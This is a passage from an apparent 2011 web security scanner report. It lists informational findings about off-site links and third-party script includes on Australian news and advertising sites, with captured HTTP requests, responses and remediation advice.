<div class="UIImageBlock clearfix pas fbRecommendation RES_302fe55f57b7d38a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Parties told to 'butt out' Tasmania News - The Mercury - The Voice of Tasmania" href="http://www.themercury.com.au/article/2011/09/05/258911_tasmania-news.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.themercury.com.au/article/2011/09/05/258911_tasmania-news.html" target="_blank">Parties told to 'butt out' Tasmania News - The Mercury - The Voice of Tasmania</a>
...[SNIP]...

14.86. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news

The response contains the following links to other domains:

http://au.news.yahoo.com/thewest/
http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
http://news.smh.com.au/breaking-news-national/fesa-must-stop-bickering-barnett-20110907-1jx2h.html
http://weather.news.com.au/wa/perth/perth
http://webcache.googleusercontent.com/search?q=cache:3AUWDEMa_7IJ:www.6pr.com.au/+perth+news&cd=15&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:938iZ8DqWckJ:www.7perth.com.au/view/seven-news/+perth+news&cd=12&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:GlAO5LU7AbwJ:www.topix.com/au/perth+perth+news&cd=11&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:PpyaiSPOQeEJ:www.bcl.com.au/perth/news.htm+perth+news&cd=16&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:kIhRMK-E6KwJ:www.loconut.com.au/+perth+news&cd=13&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:lI6AgAgIwoIJ:www.abc.net.au/perth/news/+perth+news&cd=10&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:zEHq6itvwzQJ:au.news.yahoo.com/thewest/+perth+news&cd=9&hl=en&ct=clnk&gl=us
http://www.6pr.com.au/
http://www.7perth.com.au/view/seven-news/
http://www.abc.net.au/perth/news/
http://www.bcl.com.au/perth/news.htm
http://www.loconut.com.au/
http://www.news.com.au/
http://www.ntnews.com.au/
http://www.perthnow.com.au/
http://www.perthnow.com.au/fun-games/games
http://www.perthnow.com.au/fun-games/perthnow-timespool/story-e6frg473-1111114786357
http://www.perthnow.com.au/news/breaking-news
http://www.perthnow.com.au/news/top-stories
http://www.perthnow.com.au/news/western-australia
http://www.perthnow.com.au/sport
http://www.theaustralian.com.au/
http://www.themercury.com.au/
http://www.topix.com/au/perth
http://www.tribalfootball.com/articles/perth-glory-delighted-sign-ex-west-ham-youth-captain-mehmet-1867571
http://www.watoday.com.au/
http://www.youtube.com/results?q=perth+news&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=perth+news HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:13:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 106145

<!doctype html> <head> <title>perth news - Google Search</title> <script>window.google={kEI:"JnxnTtz_D6fbiAKn3MiNCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=perth+news&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.perthnow.com.au/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CB8QFjAA')"><em>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.perthnow.com.au/news/western-australia" class=l onmousedown="return clk(this,this.href,'','','','2','','0CCYQjBAwAQ')">Western Australia News</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.perthnow.com.au/news/breaking-news" class=l onmousedown="return clk(this,this.href,'','','','3','','0CCsQjBAwAg')">Breaking News</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.perthnow.com.au/news/top-stories" class=l onmousedown="return clk(this,this.href,'','','','4','','0CDAQjBAwAw')">Top Stories</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.perthnow.com.au/fun-games/perthnow-timespool/story-e6frg473-1111114786357" class=l onmousedown="return clk(this,this.href,'','','','5','','0CDUQjBAwBA')">PerthNow TimesPool</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.perthnow.com.au/fun-games/games" class=l onmousedown="return clk(this,this.href,'','','','6','','0CDoQjBAwBQ')">Games</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.perthnow.com.au/sport" class=l onmousedown="return clk(this,this.href,'','','','7','','0CD8QjBAwBg')">Sport</a>
...[SNIP]...
<h3 class="r"><a href="http://www.watoday.com.au/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CEcQFjAH')">WA Today ... Breaking <em>
...[SNIP]...
<h3 class="r"><a href="http://au.news.yahoo.com/thewest/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CE0QFjAI')">The West Australian - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:zEHq6itvwzQJ:au.news.yahoo.com/thewest/+perth+news&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CFEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.abc.net.au/perth/news/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFUQFjAJ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:lI6AgAgIwoIJ:www.abc.net.au/perth/news/+perth+news&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CFcQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.topix.com/au/perth" class=l onmousedown="return clk(this,this.href,'','','','11','','0CFwQFjAK')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:GlAO5LU7AbwJ:www.topix.com/au/perth+perth+news&cd=11&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','11','','0CF8QIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.7perth.com.au/view/seven-news/" class=l onmousedown="return clk(this,this.href,'','','','12','','0CGQQFjAL')">Seven <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:938iZ8DqWckJ:www.7perth.com.au/view/seven-news/+perth+news&cd=12&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','12','','0CGYQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.loconut.com.au/" class=l onmousedown="return clk(this,this.href,'','','','13','','0CGsQFjAM')">Loconut - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:kIhRMK-E6KwJ:www.loconut.com.au/+perth+news&cd=13&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','13','','0CG0QIDAM')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://weather.news.com.au/wa/perth/perth" class=l onmousedown="return clk(this,this.href,'','','','14','','0CHIQFjAN')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.6pr.com.au/" class=l onmousedown="return clk(this,this.href,'','','','15','','0CHcQFjAO')">6PR - Homepage</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:3AUWDEMa_7IJ:www.6pr.com.au/+perth+news&cd=15&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','15','','0CHoQIDAO')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bcl.com.au/perth/news.htm" class=l onmousedown="return clk(this,this.href,'','','','16','','0CH8QFjAP')">BCL: <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:PpyaiSPOQeEJ:www.bcl.com.au/perth/news.htm+perth+news&cd=16&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','16','','0CIEBECAwDw')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/" class=l onmousedown="return clk(this,this.href,'','','','17','','0CIYBEKkCMBA')">Wildcats abandon Bogut for Nevill</a>
...[SNIP]...
<span class=tl><a href="http://news.smh.com.au/breaking-news-national/fesa-must-stop-bickering-barnett-20110907-1jx2h.html" class=l onmousedown="return clk(this,this.href,'','','','18','','0CIwBEKkCMBE')">WA Labor launches another bushfire probe</a>
...[SNIP]...
<span class=tl><a href="http://www.tribalfootball.com/articles/perth-glory-delighted-sign-ex-west-ham-youth-captain-mehmet-1867571" class=l onmousedown="return clk(this,this.href,'','','','19','','0CJIBEKkCMBI')"><em>
...[SNIP]...
<div><a href="http://www.news.com.au/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CJwBEKIIMBM')">News.com.au</a>
...[SNIP]...
<div><a href="http://www.theaustralian.com.au/" class=l onmousedown="return clk(this,this.href,'','','','21','','0CJ4BEKIIMBQ')">The Australian</a>
...[SNIP]...
<div><a href="http://www.ntnews.com.au/" class=l onmousedown="return clk(this,this.href,'','','','22','','0CKABEKIIMBU')">Northern Territory News</a>
...[SNIP]...
<div><a href="http://www.themercury.com.au/" class=l onmousedown="return clk(this,this.href,'','','','23','','0CKIBEKIIMBY')">The Mercury</a>
...[SNIP]...

14.87. http://www.news.com.au/breaking-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.news.com.au
Path:	/breaking-news

Issue detail

The page was loaded from a URL containing a query string:

http://www.news.com.au/breaking-news?useAbsoluteURL=true

The response contains the following links to other domains:

http://news.reply.com.au/ni/newspulse.asp
http://pt200194.unica.com/ntpagetag.gif?js=0&sitename=news
http://secure-au.imrworldwide.com/cgi-bin/m?ci=newscorp&cg=0
http://secure-au.imrworldwide.com/cgi-bin/m?ci=newscorp&cg=0&cc=1
http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css
http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js
http://www.adelaidenow.com.au/
http://www.bodyandsoul.com.au/
http://www.bodyandsoul.com.au/body+fitness/
http://www.bodyandsoul.com.au/community/competitions/
http://www.bodyandsoul.com.au/food+diet/
http://www.bodyandsoul.com.au/health+healing/
http://www.cairns.com.au/
http://www.careerone.com.au/
http://www.careerone.com.au/?from=ninbar
http://www.carsguide.com.au/
http://www.carsguide.com.au/?from=ninbar
http://www.couriermail.com.au/
http://www.foxsports.com.au/
http://www.foxsports.com.au/?from=ninbar
http://www.foxsports.com.au/afl/
http://www.foxsports.com.au/cricket/
http://www.foxsports.com.au/fantasy
http://www.foxsports.com.au/football/
http://www.foxsports.com.au/league/
http://www.foxsports.com.au/motor-sports
http://www.foxsports.com.au/results
http://www.foxsports.com.au/rugby/
http://www.geelongadvertiser.com.au/
http://www.getprice.com.au/
http://www.goldcoast.com.au/
http://www.heraldsun.com.au/
http://www.ntnews.com.au/
http://www.perthnow.com.au/
http://www.realestate.com.au/
http://www.realestate.com.au/?from=ninbar
http://www.theaustralian.com.au/
http://www.themercury.com.au/
http://www.thetelegraph.com.au/
http://www.townsvillebulletin.com.au/
http://www.truelocal.com.au/
http://www.weeklytimesnow.com.au/
http://www.wego.com/
http://www.whereilive.com.au/

Request

GET /breaking-news?useAbsoluteURL=true HTTP/1.1
Host: www.news.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Vary: Accept-Encoding
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=258
Expires: Wed, 07 Sep 2011 14:24:36 GMT
Date: Wed, 07 Sep 2011 14:20:18 GMT
Content-Length: 89174
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
</script>
               <link rel="stylesheet" media="screen" type="text/css" href="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css" />
               <script type="text/javascript" src="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js"></script>
...[SNIP]...
<dd ><a href="http://www.foxsports.com.au/?from=ninbar" rel="track-nin-news">Fox Sports</a>
...[SNIP]...
<dd ><a href="http://www.careerone.com.au/?from=ninbar" rel="track-nin-news">CareerOne</a>
...[SNIP]...
<dd ><a href="http://www.carsguide.com.au/?from=ninbar" rel="track-nin-news">Carsguide</a>
...[SNIP]...
<dd class=" last "><a href="http://www.realestate.com.au/?from=ninbar" rel="track-nin-news">RealEstate</a>
...[SNIP]...
<li class="nav-body-soul ">
                           <a href="http://www.bodyandsoul.com.au/">body+soul</a>
...[SNIP]...
<li class=" first ">
                           <a href="http://www.bodyandsoul.com.au/health+healing/">Feel better</a>
...[SNIP]...
<li >
                           <a href="http://www.bodyandsoul.com.au/food+diet/">Lose weight</a>
...[SNIP]...
<li >
                           <a href="http://www.bodyandsoul.com.au/body+fitness/">Look good</a>
...[SNIP]...
<li class=" last">
                           <a href="http://www.bodyandsoul.com.au/community/competitions/">Win stuff</a>
...[SNIP]...
<li class="nav-fox-sports linkto-group-1226068505061 ">
                           <a href="http://www.foxsports.com.au/">Fox Sports</a>
...[SNIP]...
<li class=" first ">
                           <a href="http://www.foxsports.com.au/afl/">AFL</a>
...[SNIP]...
<li >
                           <a href="http://www.foxsports.com.au/league/">NRL</a>
...[SNIP]...
<li >
                           <a href="http://www.foxsports.com.au/rugby/">Rugby</a>
...[SNIP]...
<li >
                           <a href="http://www.foxsports.com.au/football/">Football</a>
...[SNIP]...
<li >
                           <a href="http://www.foxsports.com.au/cricket/">Cricket</a>
...[SNIP]...
<li >
                           <a href="http://www.foxsports.com.au/motor-sports">Motorsports</a>
...[SNIP]...
<li >
                           <a href="http://www.foxsports.com.au/fantasy">Fantasy</a>
...[SNIP]...
<li class=" last">
                           <a href="http://www.foxsports.com.au/results">Results</a>
...[SNIP]...
<li class=" first ">
                           <a href="http://www.carsguide.com.au/">Cars</a>
...[SNIP]...
<li >
                           <a href="http://www.careerone.com.au/">Jobs</a>
...[SNIP]...
<li >
                           <a href="http://www.realestate.com.au/">Real Estate</a>
...[SNIP]...
<li >
                           <a href="http://www.truelocal.com.au/">Business Directory</a>
...[SNIP]...
<li >
                           <a href="http://www.getprice.com.au/">Get Price Shopping</a>
...[SNIP]...
<li >
                           <a href="http://www.wego.com/">Wego Travel Deals</a>
...[SNIP]...
<li >
                           <a href="http://www.theaustralian.com.au/">The Australian</a>
...[SNIP]...
<li >
                           <a href="http://www.thetelegraph.com.au/">thetelegraph.com.au</a>
...[SNIP]...
<li >
                           <a href="http://www.couriermail.com.au/">The Courier-Mail</a>
...[SNIP]...
<li >
                           <a href="http://www.heraldsun.com.au/">Herald Sun</a>
...[SNIP]...
<li >
                           <a href="http://www.adelaidenow.com.au/">AdelaideNow</a>
...[SNIP]...
<li >
                           <a href="http://www.perthnow.com.au/">PerthNow</a>
...[SNIP]...
<li >
                           <a href="http://www.bodyandsoul.com.au/">body+soul</a>
...[SNIP]...
<li >
                           <a href="http://www.ntnews.com.au/">NT News</a>
...[SNIP]...
<li >
                           <a href="http://www.townsvillebulletin.com.au/">Townsville Bulletin</a>
...[SNIP]...
<li >
                           <a href="http://www.cairns.com.au/">Cairns.com.au</a>
...[SNIP]...
<li >
                           <a href="http://www.goldcoast.com.au/">Goldcoast.com.au</a>
...[SNIP]...
<li >
                           <a href="http://www.themercury.com.au/">The Mercury</a>
...[SNIP]...
<li >
                           <a href="http://www.geelongadvertiser.com.au/">Geelong Advertiser</a>
...[SNIP]...
<li >
                           <a href="http://www.weeklytimesnow.com.au/">The Weekly Times</a>
...[SNIP]...
<li class=" last">
                           <a href="http://www.whereilive.com.au/">Community News</a>
...[SNIP]...
<li class="tool-newsletter"><a href="http://news.reply.com.au/ni/newspulse.asp" >Newsletters</a>
...[SNIP]...
<div><img src="//secure-au.imrworldwide.com/cgi-bin/m?ci=newscorp&cg=0&cc=1" alt=""/></div>
...[SNIP]...
<div>
       <img src="//pt200194.unica.com/ntpagetag.gif?js=0&sitename=news" alt="" />
       <img src="//secure-au.imrworldwide.com/cgi-bin/m?ci=newscorp&cg=0" alt="" />
       </div>
...[SNIP]...

14.88. http://www.weatherchannel.com.au/weather-widget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weatherchannel.com.au
Path:	/weather-widget.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.weatherchannel.com.au/weather-widget.aspx?style=

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://secure-au.imrworldwide.com/cgi-bin/m?ci=mcn&cg=weatherch&cc=1&ts=noscript
http://secure-au.imrworldwide.com/v60.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js

Request

GET /weather-widget.aspx?style= HTTP/1.1
Host: www.weatherchannel.com.au
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Cache-Control: private, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Wed, 07 Sep 2011 14:14:54 GMT
X-Powered-By: ASP.NET
X-Cache-Info: not cacheable; response specified "Cache-Control: private"
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/twc/javascript/jquery-ui-1.8.6.custom.css" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js"></script>
...[SNIP]...


<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js">
</script>
...[SNIP]...
<div>
<img src="//secure-au.imrworldwide.com/cgi-bin/m?ci=mcn&cg=weatherch&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

15. Cross-domain script include previous next
There are 60 instances of this issue:

http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16
http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
http://au.news.yahoo.com/thewest/business/
http://au.pfinance.yahoo.com/compare/distribution/wan-widget/
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
http://news.smh.com.au/favicon.ico
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html
http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html
http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js
http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars.homepage_min.js
http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js
http://weather.news.com.au/wa/perth/perth
http://weather.news.com.au/widgets/local/
http://weather.news.com.au/widgets/monthly-almanac/
http://weather.news.com.au/widgets/radar/
http://weather.news.com.au/widgets/satellite/
http://web.adblade.com/imps.php
http://www.6pr.com.au/
http://www.6pr.com.au/blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html
http://www.6pr.com.au/not_found.html
http://www.6pr.com.au/trolls-attack-shark-victim/20110907-1jxqv.html
http://www.7perth.com.au/view/2/
http://www.7perth.com.au/view/about/
http://www.7perth.com.au/view/seven-news/
http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/
http://www.facebook.com/connect/connect.php
http://www.facebook.com/plugins/likebox.php
http://www.news.com.au/breaking-news
http://www.ntnews.com.au/
http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
http://www.perthnow.com.au/
http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
http://www.smh.com.au/business
http://www.themercury.com.au/
http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
http://www.watoday.com.au/
http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
http://www.weatherchannel.com.au/weather-widget.aspx

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

15.1. http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.au.doubleclick.net
Path:	/adi/N799.Yahoo1/B4631682.16

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

15.2. http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6560.159469.AOD-INVITE/B5795406.3

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.doubleverify.com/script395.js?agnc=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick
http://s1.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 07 Sep 2011 14:14:25 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 7676
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">

<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script395.js?agnc=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick'></script>
...[SNIP]...

15.3. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The response dynamically includes the following script from another domain:

